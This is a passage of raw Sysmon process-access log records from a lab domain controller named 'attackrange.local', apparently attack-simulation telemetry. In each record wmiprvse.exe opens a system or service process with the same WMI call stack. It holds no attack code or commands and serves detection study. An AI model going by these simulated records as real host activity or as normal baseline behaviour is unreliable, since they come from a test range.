RT4.dll+111bc 10341000x8000000000000000786530Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786529Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786528Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786527Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786526Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786525Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786524Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786523Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786522Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786521Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786520Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786519Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786518Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786517Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786516Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786515Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786514Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786513Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786512Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786511Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786510Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 